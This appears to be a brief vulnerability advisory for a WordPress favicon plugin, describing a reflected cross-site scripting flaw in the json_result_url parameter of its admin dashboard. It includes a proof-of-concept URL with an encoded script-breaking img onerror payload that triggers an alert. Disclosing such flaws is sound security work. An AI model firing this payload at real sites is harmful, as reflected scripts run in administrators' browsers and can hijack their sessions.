The plugin does not properly sanitise and escape the json_result_url parameter before outputting it back in the Favicon admin dashboard, leading to a Reflected Cross-Site Scripting issue
https://example.com/wp-admin/themes.php?page=favicon-by-realfavicongenerator%2Fadmin%2Fclass-favicon-by-realfavicongenerator-admin.phpfavicon_appearance_menu&json_result_url=.example.com%3C%2Fscript%3E%3Cimg%2Fsrc%2Fonerror%3Dalert%28/XSS/%29+%2F%2F